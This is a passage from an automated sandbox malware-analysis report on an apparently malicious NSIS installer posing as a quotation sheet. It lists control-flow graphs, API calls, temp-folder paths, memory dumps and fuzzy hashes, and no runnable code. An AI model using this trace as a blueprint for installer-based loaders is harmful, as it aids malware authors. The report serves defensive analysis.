                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateValuelstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp
                                                                                • API String ID: 1356686001-2551829887
                                                                                • Opcode ID: fb028ea9a3c1377fa955fbec5e4f8c63137c8eb023b24ebe4bb089e106aefc17
                                                                                • Instruction ID: 5da3480c5977201a3ee5f00a5bba4dd76bcb837ef72d2191196963f4bf358416
                                                                                • Opcode Fuzzy Hash: fb028ea9a3c1377fa955fbec5e4f8c63137c8eb023b24ebe4bb089e106aefc17
                                                                                • Instruction Fuzzy Hash: C91175B1E00108BFEB10EFA4DE89EAF7A79EB54358F10403AF505B61D1D7B85D419B28

                                                                                Control-flow Graph

                                                                                control_flow_graph 678 405b05-405b0f 679 405b10-405b3b GetTickCount GetTempFileNameA 678->679 680 405b4a-405b4c 679->680 681 405b3d-405b3f 679->681 682 405b44-405b47 680->682 681->679 683 405b41 681->683 683->682
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00405B19
                                                                                • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405B33
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B08
                                                                                • nsa, xrefs: 00405B10
                                                                                • "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe", xrefs: 00405B05
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CountFileNameTempTick
                                                                                • String ID: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                • API String ID: 1716503409-3617279630
                                                                                • Opcode ID: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                                                • Instruction ID: 324d89babc139fd35718223d4ac3f7893030d86c2087b7febc7e38ed5d635a65
                                                                                • Opcode Fuzzy Hash: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                                                • Instruction Fuzzy Hash: ABF082367486086BDB109F55EC08B9BBBADDF91750F10C03BFA089A1D0D6B1B9548B59

                                                                                Control-flow Graph

                                                                                control_flow_graph 684 100016bd-100016f9 call 10001a5d 688 1000180a-1000180c 684->688 689 100016ff-10001703 684->689 690 10001705-1000170b call 100021b0 689->690 691 1000170c-10001719 call 100021fa 689->691 690->691 696 10001749-10001750 691->696 697 1000171b-10001720 691->697 698 10001770-10001774 696->698 699 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 696->699 700 10001722-10001723 697->700 701 1000173b-1000173e 697->701 705 100017b2-100017b8 call 100023da 698->705 706 10001776-100017b0 call 10001559 call 100023da 698->706 722 100017b9-100017bd 699->722 703 10001725-10001726 700->703 704 1000172b-1000172c call 100027e8 700->704 701->696 707 10001740-10001741 call 10002aa3 701->707 711 10001733-10001739 call 10002589 703->711 712 10001728-10001729 703->712 718 10001731 704->718 705->722 706->722 715 10001746 707->715 721 10001748 711->721 712->696 712->704 715->721 718->715 721->696 727 100017fa-10001801 722->727 728 100017bf-100017cd call 100023a0 722->728 727->688 730 10001803-10001804 GlobalFree 727->730 734 100017e5-100017ec 728->734 735 100017cf-100017d2 728->735 730->688 734->727 737 100017ee-100017f9 call 100014e2 734->737 735->734 736 100017d4-100017dc 735->736 736->734 738 100017de-100017df FreeLibrary 736->738 737->727 738->734
                                                                                APIs
                                                                                  • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                  • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                  • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                                • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                  • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                                  • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                                  • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38301650689.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.38301620249.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000000.00000002.38301679644.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000000.00000002.38301712469.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                • String ID:
                                                                                • API String ID: 1791698881-3916222277
                                                                                • Opcode ID: 676a92eb632660267f66b66a0e8313324764f953d5bc12d8e45a65eb3bf091b8
                                                                                • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                                • Opcode Fuzzy Hash: 676a92eb632660267f66b66a0e8313324764f953d5bc12d8e45a65eb3bf091b8
                                                                                • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60

                                                                                Control-flow Graph

                                                                                control_flow_graph 741 401f90-401f9c 742 401fa2-401fb8 call 402a3a * 2 741->742 743 402057-402059 741->743 752 401fc7-401fd5 LoadLibraryExA 742->752 753 401fba-401fc5 GetModuleHandleA 742->753 744 4021c4-4021c9 call 401423 743->744 750 4028cf-4028de 744->750 755 401fd7-401fe4 GetProcAddress 752->755 756 402050-402052 752->756 753->752 753->755 758 402023-402028 call 40507c 755->758 759 401fe6-401fec 755->759 756->744 764 40202d-402030 758->764 760 402005-40201c call 100016bd 759->760 761 401fee-401ffa call 401423 759->761 767 40201e-402021 760->767 761->764 772 401ffc-402003 761->772 764->750 765 402036-40203e call 403783 764->765 765->750 771 402044-40204b FreeLibrary 765->771 767->764 771->750 772->764
                                                                                APIs
                                                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                  • Part of subcall function 0040507C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00402C8E,00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000), ref: 004050D8
                                                                                  • Part of subcall function 0040507C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll), ref: 004050EA
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 2987980305-0
                                                                                • Opcode ID: b82c88c6cdd41f668a258d9321a56f749b41029914ab3ade980903f4ce5240ef
                                                                                • Instruction ID: 215a549463b1ff6cdb2c8ab56b147df35cc58612cba094cab406bca79a610b2d
                                                                                • Opcode Fuzzy Hash: b82c88c6cdd41f668a258d9321a56f749b41029914ab3ade980903f4ce5240ef
                                                                                • Instruction Fuzzy Hash: A0212E76904215FBDF217F648E48A6E3670AB45318F30423BF701B62D0D7BC4942DA6E
                                                                                APIs
                                                                                  • Part of subcall function 0040596E: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,?,004059DA,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,75DF3410,?,75DF2EE0,00405725,?,75DF3410,75DF2EE0,00000000), ref: 0040597C
                                                                                  • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405981
                                                                                  • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405995
                                                                                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                  • Part of subcall function 00405542: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405585
                                                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte,00000000,00000000,000000F0), ref: 00401634
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte, xrefs: 00401629
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte
                                                                                • API String ID: 1892508949-3731622782
                                                                                • Opcode ID: 7c082fd94d62b49e0a0772216ac902d0a5e288ced7259b00feb75cd76b1be880
                                                                                • Instruction ID: f000a06b92b438bb55e13d50866b264c9e4ef6e61e5cb38cc97b05dde0840845
                                                                                • Opcode Fuzzy Hash: 7c082fd94d62b49e0a0772216ac902d0a5e288ced7259b00feb75cd76b1be880
                                                                                • Instruction Fuzzy Hash: 3F110436504151BFEF217B654C405BF27B0EA92324738467FE592B22E6C63C0A42AA3E
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
                                                                                • CloseHandle.KERNEL32(?), ref: 0040562A
                                                                                Strings
                                                                                • Error launching installer, xrefs: 00405607
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: Error launching installer
                                                                                • API String ID: 3712363035-66219284
                                                                                • Opcode ID: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                                                                • Instruction ID: f5a249c54adfd8c255b7380a03a9b1716d63bb632b604881324be9db7dcd8e21
                                                                                • Opcode Fuzzy Hash: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                                                                • Instruction Fuzzy Hash: EAE0BFB4A002097FEB109B64ED45F7B76ACEB10704F908571BD15F2160D678A9518A79
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
                                                                                • Instruction ID: 9d08257b753d1dc8d50a425e5d18a9377fc83dd762af72a05302a0d5f43d32a7
                                                                                • Opcode Fuzzy Hash: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
                                                                                • Instruction Fuzzy Hash: EDA13571E00228CBDB28CFA9C8547ADBBB1FF44305F15816ED856BB281D7785A96CF44
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
                                                                                • Instruction ID: 4069c4fc72520be48e16bfd385b53c7c255c7f0e47fd3261c7dbfe51bff91a5a
                                                                                • Opcode Fuzzy Hash: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
                                                                                • Instruction Fuzzy Hash: 0B913470E04228CBEF28CF99C8547ADBBB1FF44305F15816AD856BB291C378A996CF44
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
                                                                                • Instruction ID: e16a5cd5122dbeef30614bcf2b0def54f3f28e6aa070a3c0d2e235184150711d
                                                                                • Opcode Fuzzy Hash: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
                                                                                • Instruction Fuzzy Hash: B1814771E04228CBDF24CFA9C8447ADBBB1FF44305F25816AD856BB281C7789996CF54
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
                                                                                • Instruction ID: 250af7da94f29308333f8738aaa2927d74ee5fc9a8e658dcecc26e0f3faccd11
                                                                                • Opcode Fuzzy Hash: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
                                                                                • Instruction Fuzzy Hash: A7816631E04228DBDF24CFA9C8447AEBBB1FF44305F11816AD856BB281C7785A96CF54
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
                                                                                • Instruction ID: d3a2940f28ad1956632bfd73bee9eff7b9b7c3d901c1c2bf8e917ae235022c86
                                                                                • Opcode Fuzzy Hash: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
                                                                                • Instruction Fuzzy Hash: 2D713471E00228DBDF24CFA9C8547ADBBB1FF44305F15806AD816BB281C778AA96DF54
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
                                                                                • Instruction ID: aa5f261e6b50ba4db5ffebf04d3efdb0ff665d1262494a5322ec58a673e68ddc
                                                                                • Opcode Fuzzy Hash: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
                                                                                • Instruction Fuzzy Hash: 91715671E00228DBDF28CF99C854BADBBB1FF44305F15806AD816BB281C778A992DF54
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
                                                                                • Instruction ID: ff328c296e0f6909f1720754cbeef76fe0f6b635d5236ea2459b9db161edb35a
                                                                                • Opcode Fuzzy Hash: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
                                                                                • Instruction Fuzzy Hash: 9F715771E00228DBEF28CF99C8547ADBBB1FF44305F15806AD856BB281C778AA56DF44
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00403078
                                                                                  • Part of subcall function 004031E3: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EE1,?), ref: 004031F1
                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00402F8E,00000004,00000000,00000000,?,?,00402F08,000000FF,00000000,00000000,00409130,?), ref: 004030AB
